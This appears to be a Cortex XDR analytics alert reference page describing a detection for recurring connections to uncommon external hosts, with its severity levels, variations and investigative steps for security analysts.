Uncommon recurring rare external host access

Cortex XDR Analytics Alert Reference by Alert name
Product
Cortex XDR
Last date published
2026-02-02
Category
Analytics Alert Reference
Index by
Alert name

Synopsis

Activation Period

14 Days

Training Period

30 Days

Test Period

N/A (single event)

Deduplication Period

14 Days

Required Data

  • Requires:
    • XDR Agent

Detection Modules

Detector Tags

Abnormal Communication Analytics

ATT&CK Tactic

ATT&CK Technique

Severity

Informational

Description

A process has established recurring connections to an uncommon external host.

Attacker's Goals

Communicate with malware running on your network to control malware activities, perform software updates on the malware, or to take inventory of infected machines. Additionally, establish command and control channels for remote malware control, conduct discovery activities to gather information about the target environment, or exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also periodically contacting the same external host.
  • Inspect the domain or URL for malicious indicators or its presence in threat intelligence feeds and reputation lists.

Variations

Uncommon recurring rare external host access by an automated penetration testing tool

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

High

Description

A process has established recurring connections to an uncommon external host.

Attacker's Goals

Communicate with malware running on your network to control malware activities, perform software updates on the malware, or to take inventory of infected machines. Additionally, establish command and control channels for remote malware control, conduct discovery activities to gather information about the target environment, or exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also periodically contacting the same external host.
  • Inspect the domain or URL for malicious indicators or its presence in threat intelligence feeds and reputation lists.


Uncommon recurring rare external host access to a dynamic DNS domain

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

A process has established recurring connections to an uncommon external host.

Attacker's Goals

Communicate with malware running on your network to control malware activities, perform software updates on the malware, or to take inventory of infected machines. Additionally, establish command and control channels for remote malware control, conduct discovery activities to gather information about the target environment, or exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also periodically contacting the same external host.
  • Inspect the domain or URL for malicious indicators or its presence in threat intelligence feeds and reputation lists.


Uncommon recurring rare external host access initiated by a cron job

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

A process has established recurring connections to an uncommon external host.

Attacker's Goals

Communicate with malware running on your network to control malware activities, perform software updates on the malware, or to take inventory of infected machines. Additionally, establish command and control channels for remote malware control, conduct discovery activities to gather information about the target environment, or exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also periodically contacting the same external host.
  • Inspect the domain or URL for malicious indicators or its presence in threat intelligence feeds and reputation lists.


Uncommon recurring rare external host access with a rare top-level domain

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

A process has established recurring connections to an uncommon external host.

Attacker's Goals

Communicate with malware running on your network to control malware activities, perform software updates on the malware, or to take inventory of infected machines. Additionally, establish command and control channels for remote malware control, conduct discovery activities to gather information about the target environment, or exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also periodically contacting the same external host.
  • Inspect the domain or URL for malicious indicators or its presence in threat intelligence feeds and reputation lists.


Uncommon recurring rare external host access using an exfiltration tool

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

A process has established recurring connections to an uncommon external host.

Attacker's Goals

Communicate with malware running on your network to control malware activities, perform software updates on the malware, or to take inventory of infected machines. Additionally, establish command and control channels for remote malware control, conduct discovery activities to gather information about the target environment, or exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also periodically contacting the same external host.
  • Inspect the domain or URL for malicious indicators or its presence in threat intelligence feeds and reputation lists.


Uncommon recurring rare external host access with a sensitive file in actor or causality command line

Synopsis

ATT&CK Tactic

ATT&CK Technique

Severity

Low

Description

A process has established recurring connections to an uncommon external host.

Attacker's Goals

Communicate with malware running on your network to control malware activities, perform software updates on the malware, or to take inventory of infected machines. Additionally, establish command and control channels for remote malware control, conduct discovery activities to gather information about the target environment, or exfiltrate sensitive data from compromised systems.

Investigative actions

  • Identify the process contacting the remote host and determine whether the traffic is malicious.
  • Look for other endpoints on your network that are also periodically contacting the same external host.
  • Inspect the domain or URL for malicious indicators or its presence in threat intelligence feeds and reputation lists.